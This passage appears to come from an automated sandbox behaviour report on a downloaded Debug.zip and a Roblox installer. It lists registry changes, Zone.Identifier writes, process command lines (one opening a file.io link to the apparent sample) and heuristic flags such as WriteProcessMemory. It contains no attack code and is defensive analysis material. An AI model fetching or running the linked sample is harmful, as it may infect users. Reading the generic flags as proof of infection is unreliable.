| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133690977403636301" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass.1\ = "Microsoft Edge Update Core Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassSvc\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\NumMethods\ = "24" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ = "IRegistrationUpdateHook" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ = "IGoogleUpdate3Web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher.1.0\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-3000" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc.1.0\CLSID\ = "{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods\ = "41" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService\CLSID\ = "{CECDDD22-2E72-4832-9606-A9B0E5E344B2}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{A6B716CB-028B-404D-B72C-50E153DD68DA}\LocalService = "edgeupdatem" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\NumMethods\ = "26" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ = "IAppCommandWeb" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\NumMethods\ = "16" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\version-86c3597a87f4495e\\RobloxPlayerBeta.exe\" %1" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\DefaultIcon\ = "C:\\Program Files (x86)\\Roblox\\Versions\\version-86c3597a87f4495e\\RobloxPlayerBeta.exe" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ = "IRegistrationUpdateHook" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher.1.0 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\ = "URL: Roblox Protocol" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods\ = "41" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8B15189E-5465-4166-933D-1EABAD9648CB}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\"" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ = "IGoogleUpdateCore" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\Elevation\Enabled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\ = "URL: Roblox Protocol" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ = "IPolicyStatusValue" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Debug.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://file.io/h5Uhqk3g8uxH
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9901cc40,0x7ffd9901cc4c,0x7ffd9901cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1760,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1756 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1744,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1924 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2160,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2172 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3076,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
